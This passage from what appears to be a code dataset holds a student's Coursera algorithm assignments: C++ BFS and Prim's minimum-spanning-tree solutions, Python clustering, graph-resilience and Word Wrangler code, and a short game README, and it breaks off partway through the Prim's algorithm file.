"text": "// file: bfs.cpp\r\n// author: Shamsuddin Rehmani\r\n// date: 2016-07-10\r\n// description: Problem 1 of the third assignment of Algorithms on Graphs\r\n//\t\t\t\tby University of California, San Diego & Higher School of Economics on Coursera\r\n//\r\n// The task was : Given an undirected graph with n vertices and m edges and two vertices \r\n//\t\t\t\tu and v, compute the length of a shortest path between u and v(that is, the minimum \r\n//\t\t\t\tnumber of edges in a path from u to v).\r\n//\r\n//\t\t\t\tInput Format. A graph is given in the standard format. The next line contains two vertices u and v\r\n//\r\n//\t\t\t\tOutput: the minimum number of edges in a path from u to v, or −1 if there is no path\r\n// \r\n//\t\t\t\tStarter file with main function was already provided but implementation of\r\n//\t\t\t\tdistance function had to be completed\r\n//\t\t\t\t\r\n//\t\t\t\tThe file passed all test cases on Coursera with\r\n//\t\t\t\tmax time used: 0.17/2.00 sec, max memory used: 40/512 MB. \r\n\r\n#include <iostream>\r\n#include <vector>\r\n#include <queue>\r\n\r\nusing std::vector;\r\nusing std::queue;\r\nusing std::pair;\r\n\r\n// Performs breath first search to finds the length of the shortest path between\r\n// vertice s and t of a given undirected graph adj\r\n//\r\n// PRE: 2 ≤ n ≤ 10e5; 0 ≤ m ≤ 10e5; t != s; 0 <= t,s < n (note that m = edges of undirected graph\r\n//\t\tadj and n = size of adj)\r\n// POST: return the shortest path between s and t if there exists one or -1 otherwise if s and t are not connected\r\n// PARAM: adj = an undirected graph represented in adjacancey list with n vertices and m edges where n is adj.size() \r\n//\t\t s = a vertice of the graph adj\r\n//\t\t t = another vertice of the graph adj (t != s)\r\n\r\nint distance(vector<vector<int> > &adj, int s, int t) {\r\n\r\n\t//intialize an empty queue\r\n\tqueue<int> myQueue;\r\n\t//intialize a vector of pairs of int and bool. Index of the vector represents the vertice number, int represents the\r\n\t//current minimum distance to reach that vertice from s and bool represent whether that vertice has been visited yet.\r\n\tvector<pair<int, bool>> dist(adj.size(), std::make_pair(0, false));\r\n\t//set the start vertice s as visited \r\n\tdist[s].second = true;\r\n\t//push the start vertice onto the queue\r\n\tmyQueue.push(s);\r\n\t//intialize a variable to keep track of the current vertice\r\n\tint w;\r\n\r\n\t//while queue is not empty\r\n\twhile (!myQueue.empty())\r\n\t{\r\n\t\t//get the vertice from the front of the queue\r\n\t\tw = myQueue.front();\r\n\r\n\t\t//if the current vertice is the same as the target vertice, return the distance of that vertice. \r\n\t\t//this is the shorted distance from s to t\r\n\t\tif (w == t)\r\n\t\t\treturn dist[t].first;\r\n\r\n\t\t//remove the vertice from the front\r\n\t\tmyQueue.pop();\r\n\r\n\t\t//for all vertices (adj[w][v]) reachable from w\r\n\t\tfor (vector<int>::size_type v = 0; v < adj[w].size(); v++) {\r\n\r\n\t\t\t//if the current vertice has not yet been visited\r\n\t\t\tif (dist[adj[w][v]].second == false) {\r\n\t\t\t\t\r\n\t\t\t\t//mark it as visited\r\n\t\t\t\tdist[adj[w][v]].second = true;\r\n\t\t\t\t//push this vertice onto the queue\r\n\t\t\t\tmyQueue.push(adj[w][v]);\r\n\t\t\t\t//update the distance of this vertice from w. 
Since all edges have same weight, we just add 1\r\n\t\t\t\t//to the distance at w.\r\n\t\t\t\tdist[adj[w][v]].first = dist[w].first + 1;\r\n\t\t\t\t\r\n\t\t\t}\r\n\r\n\t\t}\r\n\t}\r\n\t\r\n\treturn -1;\r\n}\r\n\r\nint main() {\r\n\t\r\n\t\r\n\tint n, m;\r\n\tstd::cin >> n >> m;\r\n\tvector<vector<int> > adj(n, vector<int>());\r\n\tfor (int i = 0; i < m; i++) {\r\n\t\tint x, y;\r\n\t\tstd::cin >> x >> y;\r\n\t\tadj[x - 1].push_back(y - 1);\r\n\t\tadj[y - 1].push_back(x - 1);\r\n\t}\r\n\tint s, t;\r\n\tstd::cin >> s >> t;\r\n\ts--, t--;\r\n\tstd::cout << distance(adj, s, t);\r\n\t\r\n\t\r\n\r\n\t// Few test case to check if the distance function works. These are commented since the \r\n\t// assignment requires the bfs.cpp file to read input values and output the respective\r\n\t// results on the console\r\n\t/**************************************************************************************\r\n\r\n\t//Test 1\r\n\tvector<vector<int> > adj1(4, vector<int>());\r\n\tadj1[1 - 1].push_back(2 - 1);\r\n\tadj1[2 - 1].push_back(1 - 1);\r\n\r\n\tadj1[1 - 1].push_back(4 - 1);\r\n\tadj1[4 - 1].push_back(1 - 1);\r\n\r\n\tadj1[1 - 1].push_back(3 - 1);\r\n\tadj1[3 - 1].push_back(1 - 1);\r\n\r\n\tadj1[2 - 1].push_back(3 - 1);\r\n\tadj1[3 - 1].push_back(2 - 1);\r\n\r\n\tif (distance(adj1, 4 - 1, 2 - 1) == 2)\r\n\t\tstd::cout << \"Test 1 passed\" << std::endl;\r\n\telse\r\n\t\tstd::cout << \"Test 1 Failed\" << std::endl;\r\n\r\n\t//Test2\r\n\tif (distance(adj1, 4 - 1, 3 - 1) == 2)\r\n\t\tstd::cout << \"Test 2 passed\" << std::endl;\r\n\telse\r\n\t\tstd::cout << \"Test 2 Failed\" << std::endl;\r\n\r\n\t//Test 3\r\n\tvector<vector<int> > adj2(5, vector<int>());\r\n\tadj2[2 - 1].push_back(1 - 1);\r\n\tadj2[1 - 1].push_back(2 - 1);\r\n\r\n\tadj2[3 - 1].push_back(2 - 1);\r\n\tadj2[2 - 1].push_back(3 - 1);\r\n\r\n\tadj2[1 - 1].push_back(3 - 1);\r\n\tadj2[3 - 1].push_back(1 - 1);\r\n\r\n\tadj2[4 - 1].push_back(3 - 1);\r\n\tadj2[3 - 1].push_back(4 - 1);\r\n\r\n\tadj2[4 - 1].push_back(1 - 1);\r\n\tadj2[1 - 1].push_back(4 - 1);\r\n\r\n\tadj2[5 - 1].push_back(2 - 1);\r\n\tadj2[2 - 1].push_back(5 - 1);\r\n\r\n\tadj2[5 - 1].push_back(3 - 1);\r\n\tadj2[3 - 1].push_back(5 - 1);\r\n\t\r\n\tif (distance(adj2, 4 - 1, 5 - 1) == 2)\r\n\t\tstd::cout << \"Test 3 passed\" << std::endl;\r\n\telse\r\n\t\tstd::cout << \"Test 3 Failed\" << std::endl;\r\n\r\n\t//Test 4\r\n\tvector<vector<int> > adj3(5, vector<int>());\r\n\tadj3[5 - 1].push_back(2 - 1);\r\n\tadj3[2 - 1].push_back(5 - 1);\r\n\r\n\tadj3[1 - 1].push_back(3 - 1);\r\n\tadj3[3 - 1].push_back(1 - 1);\r\n\r\n\tadj3[3 - 1].push_back(4 - 1);\r\n\tadj3[4 - 1].push_back(1 - 1);\r\n\r\n\tadj3[1 - 1].push_back(4 - 1);\r\n\tadj3[4 - 1].push_back(1 - 1);\r\n\r\n\tif (distance(adj3, 3 - 1, 5 - 1) == -1)\r\n\t\tstd::cout << \"Test 4 passed\" << std::endl;\r\n\telse\r\n\t\tstd::cout << \"Test 4 Failed\" << std::endl;\r\n\r\n\t****************************************************************************************************/\r\n\r\n\t\r\n}\r\n"
},
{
"alpha_fraction": 0.6077950596809387,
"alphanum_fraction": 0.6187032461166382,
"avg_line_length": 43.81867980957031,
"blob_id": "11f5de7bfca7cea81aaf6d1ba4c085bfc0e02964",
"content_id": "7f38410c79f3da77f0586c6e1e7141b132786f72",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8159,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 182,
"path": "/Fundamentals of Computing Specialization/Algorithmic Thinking (Part 2)/Module 3/alg_project3_solution.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nAll the algorithms for Project 3 for closest\npair and clustering \n\"\"\"\n\nimport alg_cluster\n\n######################################################\n# Code for closest pairs of clusters\ndef slow_closest_pair(cluster_list):\n \"\"\"\n Uses the brute-force algorithm (O(n^2)) to find the closest pair of clusters in a list\n \n Arguments:\n cluster_list {Cluster} -- a list of Cluster objects\n \n Returns:\n tuple -- returns a closest pair where the pair is represented by the tuple \n (dist, idx1, idx2) with idx1 < idx2 where dist is the distance between \n the closest pair cluster_list[idx1] and cluster_list[idx2].\n \"\"\"\n # initialize the tuple that will store the closest pair of cluster distance and index\n (dist, idx1, idx2) = (float(\"inf\"), -1, -1)\n \n for clusteri_idx in range(len(cluster_list)):\n for clusterj_idx in range(len(cluster_list)):\n if (clusteri_idx != clusterj_idx):\n curr_dist = cluster_list[clusteri_idx].distance(cluster_list[clusterj_idx])\n (dist, idx1, idx2) = (min(set([(dist, idx1, idx2), (curr_dist, clusteri_idx, clusterj_idx)]), \n key = lambda tup: tup[0]))\n\n if (idx2 > idx1):\n return (dist, idx1, idx2)\n else:\n return (dist, idx2, idx1)\n\ndef fast_closest_pair(cluster_list):\n \"\"\"\n Compute the distance between the closest pair of clusters in a list using fast algorithm \n [O(n*(logn)^2]\n \n Arguments:\n cluster_list {list} -- list of clusters sorted based on the horizontal distance of \n their centers in ascending order\n \n Returns:\n tuple -- tuple of the form (dist, idx1, idx2) where the centers of the clusters\n cluster_list[idx1] and cluster_list[idx2] have minimum distance dist.\n \"\"\"\n\n # base case \n if len(cluster_list) <= 3:\n (dist, idx1, idx2) = slow_closest_pair(cluster_list)\n\n # inductive case \n else:\n # divide the problem in half, solve it and then merge the results from both\n idx_m = len(cluster_list) / 2\n # solve for the left half of the cluster list\n (d_left, idxi_l, idxj_l) = fast_closest_pair(cluster_list[ : idx_m]) \n # solve for right half of the cluster list\n (d_right, idxi_r, idxj_r) = fast_closest_pair(cluster_list[idx_m : ])\n # find the minimum of the left and right paritiion minimum distances\n (dist, idx1, idx2) = (min(set([(d_left, idxi_l, idxj_l), (d_right, idxi_r + idx_m, idxj_r + idx_m)]), \n key = lambda tup: tup[0]))\n # find the the horizontal position of the strip's vertical center line i.e the midpoint of the\n # horizontal position of the last element of the left perition and first element of the right parition \n horiz_center = 0.5 * (cluster_list[idx_m - 1].horiz_center() + cluster_list[idx_m].horiz_center())\n # find the minimum of the minimum distance found earlier and the closest pair in the strip \n (dist, idx1, idx2) = (min(set([(dist, idx1, idx2), closest_pair_strip(cluster_list, horiz_center, dist)]), \n key = lambda tup: tup[0]))\n\n return (dist, idx1, idx2) \n\ndef closest_pair_strip(cluster_list, horiz_center, half_width) :\n \"\"\"\n Helper function to compute the closest pair of clusters in a vertical strip\n \n Arguments:\n cluster_list {list} -- a list of Cluster objects\n horiz_center {integer} -- the horizontal position of the strip's vertical center line \n half_width {integer} -- the half the width of the strip (i.e; the maximum horizontal distance\n that a cluster can lie from the center line)\n \n Returns:\n tuple -- returns a tuple of the form (dist, idx1, idx2) where the centers of the clusters\n cluster_list[idx1] and cluster_list[idx2] lie in the 
strip and have minimum distance dist. \n \"\"\"\n\n # store all cluster whose centres are within the vertical strip specified by horiz_center and half_width\n strip_clust = [(cluster_list[clst_idx], clst_idx) for clst_idx in range(len(cluster_list)) \n if abs(cluster_list[clst_idx].horiz_center() - horiz_center) < half_width ]\n \n # sort the cluster based on their vertical distances\n strip_clust.sort(key = lambda cluster: cluster[0].vert_center())\n\n # intialize the minimium ditance and their indices\n (dist, idx1, idx2) = (float(\"inf\"), -1, -1)\n\n # for each cluster inspect the next 3 ones and record the pair of cluster indices that\n # corresponds to closest pair thus found\n for clsti_idx in range(len(strip_clust) - 1):\n for clstj_idx in range(clsti_idx + 1, min((clsti_idx + 4), len(strip_clust))):\n curr_dist = strip_clust[clsti_idx][0].distance(strip_clust[clstj_idx][0])\n (dist, idx1, idx2) = (min(set([(dist, idx1, idx2), \n (curr_dist, strip_clust[clsti_idx][1], strip_clust[clstj_idx][1])]), key = lambda tup: tup[0]))\n \n # return minimum distance and their indicies (dist, idx1, idx2) where idx1 < idx2 \n if (idx2 > idx1):\n return (dist, idx1, idx2)\n else:\n return (dist, idx2, idx1)\n\n######################################################################\n# Code for hierarchical clustering\ndef hierarchical_clustering(cluster_list, num_clusters):\n \"\"\"\n Compute a hierarchical clustering of a set of clusters\n Note: the function mutates cluster_list to have length num_clusters \n \n Arguments:\n cluster_list {list} -- a list of Cluster objects\n num_clusters {integer} -- integer number of clusters to be made from cluster_list\n \n Returns:\n list -- a list of Cluster objects whose length is num_clusters\n \"\"\"\n\n while len(cluster_list) > num_clusters:\n # sort the cluster based on their horizontal distances\n #print cluster_list\n cluster_list.sort(key = lambda cluster: cluster.horiz_center())\n #print cluster_list\n (dummy_dist, idx1, idx2) = fast_closest_pair(cluster_list)\n cluster_list[idx1].merge_clusters(cluster_list[idx2])\n #print cluster_list\n cluster_list.pop(idx2)\n\n return cluster_list\n\n######################################################################\n# Code for k-means clustering\n\ndef kmeans_clustering(cluster_list, num_clusters, num_iterations):\n \"\"\"\n Compute the k-means clustering of a set of clusters\n Note: the function does not mutate cluster_list to have length num_clusters \n \n Arguments:\n cluster_list {list} -- a list of Cluster objects\n num_clusters {integer} -- integer number of clusters to be made from cluster_list\n num_iterations {integer} -- number of iterations\n \n Returns:\n list -- a list of Cluster objects whose length is num_clusters\n \"\"\"\n # compute an initial list of clusters with the property that each cluster consists of \n # a single county chosen from the set of the num_cluster counties with the largest populations\n cluster_list_cpy = list(cluster_list)\n cluster_list_cpy.sort(key = lambda cluster: cluster.total_population())\n cluster_len = len(cluster_list) \n old_cluster = cluster_list_cpy[cluster_len - num_clusters : ]\n \n for dummy_idx in range(num_iterations):\n # initialze an empty cluster \n new_cluster = [alg_cluster.Cluster(set(), 0.0, 0.0, 0, 0) for dummy_i in range(num_clusters)]\n for idx_i in range(cluster_len):\n min_dist = float(\"inf\")\n min_idx = -1\n # find the cluster from old_cluster and its index that is closest to current cluster \n # in the cluster_list\n for idx_j in 
range(num_clusters):\n curr_dist = old_cluster[idx_j].distance(cluster_list[idx_i])\n if curr_dist < min_dist:\n min_dist = curr_dist\n min_idx = idx_j\n # add the cluster to the new_cluster at index = min_idx\n new_cluster[min_idx].merge_clusters(cluster_list[idx_i])\n\n old_cluster = new_cluster\n \n return new_cluster\n\n\n"
},
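The functions above operate on the course's Cluster objects from alg_cluster. The (dist, idx1, idx2) convention is easier to see on bare coordinate tuples; a stand-alone brute-force sketch of the same contract (math.dist requires Python 3.8+, and fast_closest_pair above follows the same divide-plus-strip recipe on top of it):

    import math

    def slow_closest_pair(points):
        # brute-force O(n^2) closest pair on plain (x, y) tuples,
        # returning (dist, idx1, idx2) with idx1 < idx2
        best = (float("inf"), -1, -1)
        for i in range(len(points)):
            for j in range(i + 1, len(points)):
                best = min(best, (math.dist(points[i], points[j]), i, j))
        return best

For example, slow_closest_pair([(0, 0), (3, 4), (1, 1)]) returns (sqrt(2), 0, 2), since the first and third points are closest.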
{
"alpha_fraction": 0.6034660339355469,
"alphanum_fraction": 0.6195950508117676,
"avg_line_length": 30.44864845275879,
"blob_id": "b70edd07eb7d187527b5044547d655e6d268646f",
"content_id": "c02cf5d161fb2e3092e586a0658b56ed18286e3e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5828,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 185,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 2)/Mini-Project2 Word Wrangler/word_wrangler.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nStudent code for Word Wrangler game\n\"\"\"\n\nimport urllib2\nimport codeskulptor\nimport poc_wrangler_provided as provided\n\nWORDFILE = \"assets_scrabble_words3.txt\"\n\n# Functions to manipulate ordered word lists\n\ndef remove_duplicates(list1):\n \"\"\"\n Eliminate duplicates in a sorted list.\n\n Returns a new sorted list with the same elements in list1, but\n with no duplicates.\n\n This function can be iterative.\n \"\"\"\n # create a variable to store the new list of no duplicates\n new_lst = []\n # iterate over the length of list1 adding the element to\n # the new_lst if there are duplicates\n for lst_idx in range(len(list1)):\n if (lst_idx < len(list1)-1 and list1[lst_idx+1] != list1[lst_idx]):\n new_lst += [list1[lst_idx]]\n # the last elemnt of the list needs to be added since it\n # will not be added to the new_lst\n elif (lst_idx == len(list1)-1):\n new_lst += [list1[lst_idx]]\n \n return new_lst\n\ndef intersect(list1, list2):\n \"\"\"\n Compute the intersection of two sorted lists.\n\n Returns a new sorted list containing only elements that are in\n both list1 and list2.\n\n This function can be iterative.\n \"\"\"\n # initialize the list which will contain the intersection\n inters_lst = []\n # initialize input list indices to move accross the list\n idx_list1 = 0\n idx_list2 = 0\n \n # since input lists are sorted, we can traverse the list\n # in O(n+m) i.e linear time. If current element in\n # list1 is smaller than list2, we move one index forward \n # in list1. If the current element in list1 is greater than\n # element in list2, we move one index in list2. If they are\n # the same in both lists, we store it in inters_lst and \n # move one index forward for both list. We continue\n # this until one of the input lists have been completely\n # traversed.\n while idx_list1 < len(list1) and idx_list2 < len(list2):\n if (list1[idx_list1] < list2[idx_list2]):\n idx_list1 += 1\n elif (list1[idx_list1] > list2[idx_list2]):\n idx_list2 += 1\n \n else:\n inters_lst += [list1[idx_list1]]\n idx_list1 += 1\n idx_list2 += 1\n \n return inters_lst\n\n# Functions to perform merge sort\n\ndef merge(list1, list2):\n \"\"\"\n Merge two sorted lists.\n\n Returns a new sorted list containing those elements that are in\n either list1 or list2.\n\n This function can be iterative.\n \"\"\"\n # copy the input lists so that the original lists are not \n # mutated\n copy_list1 = list(list1)\n copy_list2 = list(list2)\n # this will store the merged sorted list \n new_merge_lst = []\n # pop the elments from list by checking which one is smaller\n # and add the elements in asceding order to the new_merge_lst\n while (len(copy_list1) > 0 and len(copy_list2) > 0):\n if (copy_list1[0] < copy_list2[0]):\n new_merge_lst += [copy_list1.pop(0)]\n else:\n new_merge_lst += [copy_list2.pop(0)]\n \n \n new_merge_lst += copy_list1 + copy_list2\n \n return new_merge_lst\n \ndef merge_sort(list1):\n \"\"\"\n Sort the elements of list1.\n\n Return a new sorted list with the same elements as list1.\n\n This function should be recursive.\n \"\"\"\n # check the base case when list is empty or has one element\n # In this case the list1 is alreay sorted so we return it\n if len(list1) == 1 or len(list1) == 0:\n return list1\n # the inductive/recursive case requires us to break the list \n # into 2, and perform merge sort on these two\n # recursively to get left_half and the right_half. 
\n # Once we have two sorted list, we merge them by calling\n # merge function above\n else:\n lst_mid_idx = len(list1)/2\n left_half = merge_sort(list1[ : lst_mid_idx])\n right_half = merge_sort(list1[lst_mid_idx : ])\n return merge(left_half, right_half)\n \n\n# Function to generate all strings for the word wrangler game\n\ndef gen_all_strings(word):\n \"\"\"\n Generate all strings that can be composed from the letters in word\n in any order.\n\n Returns a list of all strings that can be formed from the letters\n in word.\n\n This function should be recursive.\n \"\"\"\n # base case is when string is empty\n if len(word) == 0 :\n return [\"\"]\n # recusive case involves performing the gen_all_strings \n # recursively on the word without the first character\n # and then adding the first character to all possible \n # locations in all strings in the list of strings\n # made up of string of word characters without\n # the first word character\n else:\n first_char = word[0]\n rest_strings = gen_all_strings(word[1:])\n for string in list(rest_strings):\n string_lst = list(string)\n for str_idx in range(len(string)+1):\n string_lst.insert(str_idx, first_char)\n rest_strings += [\"\".join(string_lst)]\n string_lst.pop(str_idx)\n \n return rest_strings\n\n# Function to load words from a file\n\ndef load_words(filename):\n \"\"\"\n Load word list from the file named filename.\n\n Returns a list of strings.\n \"\"\"\n url = codeskulptor.file2url(filename)\n netfile = urllib2.urlopen(url)\n # the last character in the word is the newline\n # \"\\n\" which is not needed\n return [word[:-1] for word in netfile]\n\ndef run():\n \"\"\"\n Run game.\n \"\"\"\n words = load_words(WORDFILE)\n wrangler = provided.WordWrangler(words, remove_duplicates, \n intersect, merge_sort, \n gen_all_strings)\n provided.run_game(wrangler)\n\n# lauches the game\nrun()\n\n \n "
},
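Doctest-style expectations for the helpers above, worked out by hand (these are my examples, not part of the submission):

    # remove_duplicates([1, 2, 2, 3, 3, 3])  => [1, 2, 3]
    # intersect([1, 2, 4, 6], [2, 3, 4])     => [2, 4]
    # merge([1, 3, 5], [2, 4])               => [1, 2, 3, 4, 5]
    # merge_sort([3, 1, 2])                  => [1, 2, 3]
    # sorted(gen_all_strings("ab"))          => ['', 'a', 'ab', 'b', 'ba']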
{
"alpha_fraction": 0.6569617390632629,
"alphanum_fraction": 0.6595444679260254,
"avg_line_length": 36.359649658203125,
"blob_id": "fe0f1484d7904cb0ff0b69e2253dedfe97c59344",
"content_id": "28e92d0851371832fe5f74792562225f4f350ab9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4259,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 114,
"path": "/Fundamentals of Computing Specialization/Algorithmic Thinking (Part 1)/Module 2/alg_project2_solution.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nFunctions for Project #2: \"Connected Components and Graph Resilience\". These \nfunctions will be used for the Application #2: \"Analysis of a Computer Network\"\n\"\"\"\nfrom collections import deque\nimport alg_application2_provided as alg_app2_prov\n\ndef bfs_visited(ugraph, start_node):\n \"\"\"\n Perfoms the Breath First Seach(BFS) and returns a set of all the nodes \n that are visited starting from start_node\n \n Arguments:\n ugraph {dictionary} -- an undirect graph\n start_node {integer} -- a node in the ugraph\n \n Returns:\n set -- a set of all nodes visited by a BFS that start at start_node\n \"\"\"\n # initialize an queue with the start_node. We use python's built in double\n # ended queue, deque\n deq = deque([start_node])\n # add the start node to the visited nodes set\n visited = set([start_node]) \n # keep traversing through all the neighbors of the nodes in the queue\n # as long as the queue is not empty and mark them as visited if the nodes\n # are not yet visited\n while len(deq) != 0:\n curr_node = deq.popleft()\n for neighbor in ugraph[curr_node]:\n if not (neighbor in visited):\n visited.add(neighbor)\n deq.append(neighbor)\n\n return visited\n\ndef cc_visited(ugraph):\n \"\"\"\n Takes an undirected graph ugraph and computes the all the\n connected components of the graph\n \n Arguments:\n ugraph {dictionary} -- an undirected graph\n \n Returns:\n list of sets -- resturns a list of sets where each set has all the nodes in\n a particular connected component of the graph, and each set\n represent a connect component of the graph\n \"\"\"\n # initialize the remaining nodes in the ugraph that have not yet been visited \n remain_nodes = set(ugraph.keys())\n # initiakize the list of sets where each set is a connected component of ugraph\n con_comp = []\n\n # use BFS to find all the connect components until all the nodes of the ugraph\n # have been visisted\n while len(remain_nodes) != 0:\n not_vis_node = remain_nodes.pop()\n visited = bfs_visited(ugraph, not_vis_node)\n con_comp.append(visited)\n remain_nodes -= visited\n\n return con_comp\n\ndef largest_cc_size(ugraph):\n \"\"\"\n Takes a undirected graph and returns the size of the largest connected component\n \n Arguments:\n ugraph {dictionary} -- an undirected graph\n \n Returns:\n integer -- the size of the largest connected component of ugraph\n \"\"\"\n # find the size of all the connect components of the ugraph\n len_cc = [len(con_comp) for con_comp in cc_visited(ugraph)]\n \n # make sure to take care of the case when ugraph is empty and we get\n # an empty len_cc list\n if (len(len_cc) == 0):\n return 0\n\n # return the max size of connected compo\n return max(len_cc)\n\ndef compute_resilience(ugraph, attack_order):\n \"\"\"\n Computes a measure of resilience of an undirected graph. Takes the undirected \n graph ugraph, a list of nodes attack_order and iterates through the nodes in \n attack_order. 
For each node in the list, the function removes the given node \n and its edges from the graph and then computes the size of the largest connected \n component for the resulting graph.\n \n Arguments:\n ugraph {dictionary} -- an undirected graph\n attack_order {list of nodes} -- list of nodes that will be iterated over\n \n Returns:\n list of integers -- return a list whose (k+1)th entry is the size of the largest \n connected component in the graph after the removal of the first \n k nodes in attack_order\n \"\"\"\n new_graph = alg_app2_prov.copy_graph(ugraph)\n\n # get the size of the largest connected component before removing any nodes\n lst_max_cc = [largest_cc_size(new_graph)]\n\n # start removing each node in the attack_order and its edges from the ugraph\n # and find the largest connected component after each removal \n for remove_node in attack_order:\n alg_app2_prov.delete_node(new_graph, remove_node)\n lst_max_cc.append(largest_cc_size(new_graph))\n\n return lst_max_cc\n"
},
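compute_resilience above delegates graph copying and node deletion to alg_application2_provided, which is not in this snapshot. A stand-alone stand-in for delete_node, plus a hand-checked example on a path graph 0-1-2-3, assuming the provided helpers behave like this sketch:

    def delete_node(ugraph, node):
        # remove node and every edge touching it (stand-in for the
        # course's alg_application2_provided.delete_node)
        for neighbor in ugraph[node]:
            ugraph[neighbor].discard(node)
        del ugraph[node]

    # The path 0-1-2-3 starts as one 4-node component; removing node 1
    # splits it into {0} and {2, 3}, so the largest component drops to 2:
    #
    #   graph = {0: {1}, 1: {0, 2}, 2: {1, 3}, 3: {2}}
    #   compute_resilience(graph, [1])  => [4, 2]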
{
"alpha_fraction": 0.7808939814567566,
"alphanum_fraction": 0.7905346155166626,
"avg_line_length": 174.38461303710938,
"blob_id": "8190217a925b764102e82f124a57fa9224f24145",
"content_id": "9bab4f2abba9884a090fda9531c53480174543ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2302,
"license_type": "no_license",
"max_line_length": 571,
"num_lines": 13,
"path": "/Fundamentals of Computing Specialization/Interactive Programming in Python (Part 1)/Mini-Project2 Guess the Number/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Mini-project #2 - \"Guess the Number\"\n\nImplemented the basic guess the number game in CodeSkulptor, a browser-based Python interpreter, as part of the coursework. To play the game go [here](http://www.codeskulptor.org/#user46_0pxZwPBcUh_7.py) and press the play button on the top left corner. A pop up window will appear and allow you to enter you guess. Game can be either played with numbers from 0 to 100 or from 0 to 1000.\n\nMini-project overview taken from course page can be found below:\n* One of the simplest two-player games is “Guess the number”. The first player thinks of a secret number in some known range while the second player attempts to guess the number. After each guess, the first player answers either “Higher”, “Lower” or “Correct!” depending on whether the secret number is higher, lower or equal to the guess. In this project, you will build a simple interactive program in Python where the computer will take the role of the first player while you play as the second player.\n\n* When discussing ranges in this mini-project, we will follow the standard Python convention of including the low end of the range and excluding the high end of the range. Mathematically, we will express ranges via the notation **[low,high)**. The square bracket of the left of the range indicates that the corresponding bound should be included. The left parenthesis on the right of the range indicates that corresponding bound should be excluded. For example, the range **[0,3)** consists of numbers starting at 0 up to, but not including 3. In other words 0, 1, and 2.\n\n* You will interact with your program using an input field and several buttons. For this project, we will ignore the canvas and print the computer's responses in the console. Building an initial version of your project that prints information in the console is a development strategy that you should use in later projects as well. Focusing on getting the logic of the program correct before trying to make it display the information in some “nice” way on the canvas usually saves lots of time since debugging logic errors in graphical output can be tricky.\n\nComplete Mini-Project Description can be found at: \n<https://www.coursera.org/learn/interactive-python-1/supplement/zrxfY/mini-project-description>\n\n\n"
},
{
"alpha_fraction": 0.5747451782226562,
"alphanum_fraction": 0.5975840091705322,
"avg_line_length": 29.535715103149414,
"blob_id": "f4c2ecb6f2686d60d00e4adbc7aa5c2496385073",
"content_id": "e948d060a490f0c26c9599ebeaf3b413c9335445",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5310,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 168,
"path": "/Algorithms on Graphs/Assignment5/connecting_points.cpp",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "// file: connecting_points.cpp\r\n// author: Shamsuddin Rehmani\r\n// date: 2016-07-24\r\n// description: Problem 1 of the fifth assignment of Algorithms on Graphs\r\n//\t\t\t\tby University of California, San Diego & Higher School of Economics on Coursera\r\n//\r\n// The task was: Given n points on a plane, connect them with segments of minimum total length \r\n//\t\t\t\tsuch that there is a path between any two points.\r\n//\r\n//\t\t\t\tInput Format. The first line contains the number n of points. Each of the following n lines \r\n//\t\t\t\tdefines a point (xi, yi).\r\n//\r\n//\t\t\t\tOutput: Output the minimum total length of segments. The absolute value of the difference\r\n//\t\t\t\tbetween the answer of this program and the optimal value is at most 10e−6\r\n//\r\n// \r\n//\t\t\t\tStarter file with main function was already provided but implementation of\r\n//\t\t\t\tminimum_distance function had to be completed\r\n//\t\t\t\t\r\n//\t\t\t\tThe file passed all test cases on Coursera with\r\n//\t\t\t\tmax time used: 0.01/1.00 sec, max memory used: 8.7/512 MB. \r\n\r\n\r\n#include <algorithm>\r\n#include <iostream>\r\n#include <iomanip>\r\n#include <vector>\r\n#include <cmath>\r\n#include <queue>\r\n#include <limits>\r\n\r\nusing std::vector;\r\nusing std::queue;\r\nusing std::pair;\r\n\r\n// Used for creating a min priority queue i.e the top of the queue will contain\r\n// the smallest element.\r\n\r\nstruct pri\r\n{\r\n\tint operator() (const pair<int, double>&p1, const pair<int, double>&p2)\r\n\t{\r\n\t\treturn (p1.second > p2.second);\r\n\t}\r\n};\r\n\r\n// Uses Prim's algorithm to find the optimal way to connects given points\r\n// \r\n// PRE: 1 ≤ n ≤ 200; 10e-3 ≤ xi,yi ≤ 10e3 are all integers; All points (xi, yi) are pairwise different, no three\r\n//\t\tpoints lie on the same line (not xi and yi is ths same as value at x[i] and y[i], x.size() = y.size = n) \r\n// POST: return the minimum total length of segments (in other word the optimal way to connect all given points )\r\n// PARAM: x = vector with all the x cordinate values of the points\r\n//\t\t y = vector with all the y cordinate values of the points\r\n\r\ndouble minimum_distance(vector<int> x, vector<int> y) {\r\n\r\n\t//create a min priporty queue of pairs of int and double. Int represents teh \r\n\tstd::priority_queue<int, std::vector< pair<int, double> >, pri > min_queue;\r\n\t// create a cost vector equal to x's size and intial values of inifinity i.e a large number for all indexes \r\n\tvector<double> cost(x.size(), std::numeric_limits<double>::max());\r\n\tcost[0] = 0.;\r\n\t//the edge weight\r\n\tdouble weight = 0.;\r\n\t//minimum distance i.e. 
